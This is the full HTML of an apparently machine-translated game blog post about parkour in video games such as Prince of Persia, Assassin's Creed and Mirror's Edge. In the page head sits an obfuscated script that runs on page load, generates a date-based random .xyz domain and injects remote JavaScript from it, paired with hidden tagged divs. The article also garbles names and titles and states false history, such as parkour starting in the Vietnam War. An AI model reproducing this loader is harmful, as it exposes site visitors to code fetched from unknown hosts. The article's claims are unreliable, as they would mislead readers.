<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Parkour, an extreme sport from France, is said to be the cheapest of all extreme sports, because it doesn’t need any hardware equipment, or even protection measures. It only needs your limbs to partic">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="The application and performance of Parkour in the game, like the flow of water">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Parkour, an extreme sport from France, is said to be the cheapest of all extreme sports, because it doesn’t need any hardware equipment, or even protection measures. It only needs your limbs to partic">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/7ea32bd25f6546d7abdded39b137467b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/74baa46f6ea44607bdbf7457f45d4588.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/b8aab6c9c72e4201a4e2d01c069f72e6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/76582de16939441a80e771bca6e0fb36.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/2f09d762fb914826b6e309ef47b38658.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/256e582eb3ed42df8014f8a5677bb11e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/3c135dc3d462482eba124b7d264b2d2d.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/22d48317b20c44f1a7ed5d99a72adbfd.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/3774af580e1449379e1de74100532ee9.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/cd7d35422949479aad5e823dc8eea9ef.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="The application and performance of Parkour in the game, like the flow of water">
<meta name="twitter:description" content="Parkour, an extreme sport from France, is said to be the cheapest of all extreme sports, because it doesn’t need any hardware equipment, or even protection measures. It only needs your limbs to partic">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/7ea32bd25f6546d7abdded39b137467b.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>The application and performance of Parkour in the game, like the flow of water | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">The application and performance of Parkour in the game, like the flow of water</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Parkour, an extreme sport from France, is said to be the cheapest of all extreme sports, because it doesn’t need any hardware equipment, or even protection measures. It only needs your limbs to participate. But if an accident happens accidentally, the high medical expenses can also be compared with other extreme sports. Parkour is not only an ornamental sport, but also has the effect of strengthening body and improving personal reaction ability.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/7ea32bd25f6546d7abdded39b137467b.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>Since parkour is so ornamental, why not put it into video games? After all, no matter how to say parkour is an extreme sport, its danger and difficulty are not low. It’s better to have a try in the virtual world than to have a try in person. It not only ensures safety, but also can feel the pleasure and stimulation of Parkour. Now we can see all kinds of unique skills in video games. In a flash, we can fly across the crowd and buildings. With the passage of time, there are more and more games with Parkour elements, and as time goes on, the styles become more and more different.<br>The origin of<br>Parkour movement, also known as “city gallop”, was initiated by several French soldiers during the Vietnam War. It was originally used to quickly shuttle in the battlefield in the most efficient and safe way of movement, and then became popular in Britain after 2000. Parkour has no clear definition and rules. It can be called Parkour as long as it relies on the body to assist with various facilities or obstacles, and runs, jumps and walks through them. Parkour has four main movement modes: sprint, jump, climb and roll. All Parkour movements are derived from these four movement modes. In this way, can we call it Parkour when we turn over the railings and jump into a puddle? (funny)<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/74baa46f6ea44607bdbf7457f45d4588.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>When it comes to parkour, we have to mention such a person:   David bell  . Although Parkour became popular in the UK after 2000, it was fully developed by David.<br>David is a Frenchman. He likes to run and jump on the roof of the school when he is young. His father is a French soldier, so he was inspired by his father to create Parkour. David’s action design for parkour is influenced by Asian philosophy. According to him, parkour is “flowing like water”, free, fearless and free. David is not only the founder of parkour, but also an action actor in view of his flexible body method. The action crime movie violence block starred by David uses a lot of cool Parkour actions designed by him. I believe that the audience will be impressed by those handsome actions.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/b8aab6c9c72e4201a4e2d01c069f72e6.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>David bell, founder of Parkour</p>
<h1 id="different-themes-and-performances"><a href="#different-themes-and-performances" class="headerlink" title="different themes and performances"></a>different themes and performances</h1><p>Up to now, parkour has many branches and categories, including those focusing on sports, those focusing on viewing, and even those integrating combat into Parkour. Since there are so many kinds of Parkour in reality, it’s not to be outdone in video games, but compared with the way of Parkour in reality, it seems more untested. Here are some categories that I have summed up by myself. There is no official definition. Please have a look.</p>
<ol>
<li>Classic Parkour<br>Classic parkour, also known as plain parkour, is not as gorgeous as the real Parkour. It pays more attention to the practicality and mobile efficiency when moving. It usually appears in the game types with a long story background. After all, there was no Parkour before 2000. As mentioned above, parkour game originated in France, and its founder is also a Frenchman, so it must be quite popular among Frenchmen. When it comes to French game manufacturers, then everyone will think of Ubisoft at the first time, and Ubisoft’s number of games containing Parkour elements is definitely one of the best in the whole game field.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/76582de16939441a80e771bca6e0fb36.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>About Ubisoft’s Parkour game, the earliest one can be traced back to the early Ubisoft work Prince of Persia series. The action game Prince of Persia: sand of time released by Ubisoft in 2003 was a global sensation when it was launched. After all, before the birth of this work, there was no other game whose characters could be as agile as the protagonists in Prince of Persia. No matter running against the wall, jumping repeatedly or on the bar, everything is so flowing. Even if there is a mistake in parkour, you can use “sand of time” to backtrack the time, so as to avoid the mistake and achieve a perfect Parkour action. It is precisely because these flexible actions look like monkeys to outsiders, which makes Prince of Persia always have“ Persian monkey.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/2f09d762fb914826b6e309ef47b38658.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>As we all know, due to the recession of the follow-up works of Prince of Persia series, Ubisoft has completely hidden this series, and the assassin’s Creed series has been born instead. The author doesn’t need to introduce too much about the fire of the assassin’s Creed series. It’s a novel theme and play method. The assassin’s Creed series has a function of “free running” in the past dynasties. In this state, the characters controlled by players can easily climb over most of the buildings and obstacles. After all, as assassins, they often have to walk between various buildings to hide their whereabouts, right I can’t even climb the wall. The Parkour action in Assassin’s creed is not ornamental, but it is very practical. It is based on this relatively simple Parkour system, which has derived the impressive signboard actions of “high altitude assassination” and “leap of faith”.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/256e582eb3ed42df8014f8a5677bb11e.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>The leap of faith is not realistic. Do not imitate it</li>
<li>Realistic Parkour<br>As the name implies, realistic parkour is just like the existence of Parkour in real life, and its functionality and appreciation are the same as reality. As far as I know, there is only one realistic Parkour game with modern background, which is called the edge of the mirror. “Edge of the mirror” is released by EA, and the first person Parkour game produced by dice, the developer of battlefield series, may be asked: with the first person running, jumping and rolling, won’t you faint? Yes, in fact, this game is very unfriendly to the players who are dizzy with 3D. After all, there are many Parkour actions in the game that are the same as the reality, and they often swim between the roof and the roof, which will not only dizzy 3D, but also make people dizzy at height. But it is worth mentioning that the artistic style of “the edge of the mirror” is just like her name, like a mirror, clean and clear.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/3c135dc3d462482eba124b7d264b2d2d.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>Parkour joined in the battle is even more shocking<br>Another game with modern Parkour content is also the game of Ubisoft, which is known as “modern version of Assassin’s Creed” called “watchdog”. Although there was Parkour element in the early generation of the watchdog series, it was still a small thing compared with the assassin’s Creed series. After all, the background is modern, and it can no longer use the original methods to fight, so there is no need to scramble everywhere. And here’s watchdog 2. The protagonist of the second generation changed from the white uncle Eden pierce to the black brother Max haroway, so he has some street hip-hop attributes. As for body method, Marcus is much better than Aiden. Whether it’s back somersault, front somersault or back somersault, there’s a pattern. It’s much better than all the above works in terms of viewing.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/22d48317b20c44f1a7ed5d99a72adbfd.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>Physical strength is more suitable for fighting</li>
<li>Super power Parkour<br>The so-called super power parkour is a Parkour posture realized by unrealistic means in reality, which can only stay in the fantasy. The most important role for Parkour to play is spider man. There are so many games made with the theme of spider man. However, in manwei spider man released last year, the most effective action of spider man is to swing spider silk. With the help of spider man’s ability, players can not only use spider silk to “swing”, but also cross various narrow gaps at high speed, or run directly on the wall. In the real sense, they can run as they want and jump as they want.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/3774af580e1449379e1de74100532ee9.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>Another character worth mentioning is Alex Mercer, the protagonist of the classic action game sadism. Because of its infection with the virus, it has acquired a very destructive power. It can not only fly on the eaves and walk on the walls, but also make the everywhere in the world a mess. The cool and cold shape, the ability to destroy the sky and the earth, and the ability to jump up and down the high walls of the building are all unstoppable. After several elements are combined together, it’s hard not to let people want to be a demon king who conquers the world. It seems that the original intention of the game is to provide players with such experience, which makes boy a become one of the most classic anti hero characters in the history of the game. It is worth mentioning that Manhattan, the game map of the first generation of sadism, was the material of a cancelled spider man game.<br><img src="http://maiygu.xyz/2019/11/08/The application and performance of Parkour in the game, like the flow of water/cd7d35422949479aad5e823dc8eea9ef.jpg" alt="The application and performance of Parkour in the game, like the flow of water"><br>In that world, who doesn’t want to be an omnipotent villain?<br> concluding remarks<br>Of course, there are a lot of Parkour elements in the game or the game with Parkour as the core method of play. I will not go over them here. I hope you can turn off your computer and do more sports, or try the real Parkour. What we need to remember is that parkour, though handsome, is still dangerous. Even if we are proficient in the action, we should not try too dangerous obstacles at will.</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/The birth of waste land game is it the world you yearn for without the restriction of morality and law/" rel="next" title="The birth of waste land game is it the world you yearn for without the restriction of morality and law">
                <i class="fa fa-chevron-left"></i> The birth of waste land game is it the world you yearn for without the restriction of morality and law
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/The Star Wars Jedi, which EA sold out, once again perfectly explains what the real adaptation game is/" rel="prev" title="The Star Wars Jedi, which EA sold out, once again perfectly explains what the real adaptation game is">
                The Star Wars Jedi, which EA sold out, once again perfectly explains what the real adaptation game is <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#different-themes-and-performances"><span class="nav-number">1.</span> <span class="nav-text">different themes and performances</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
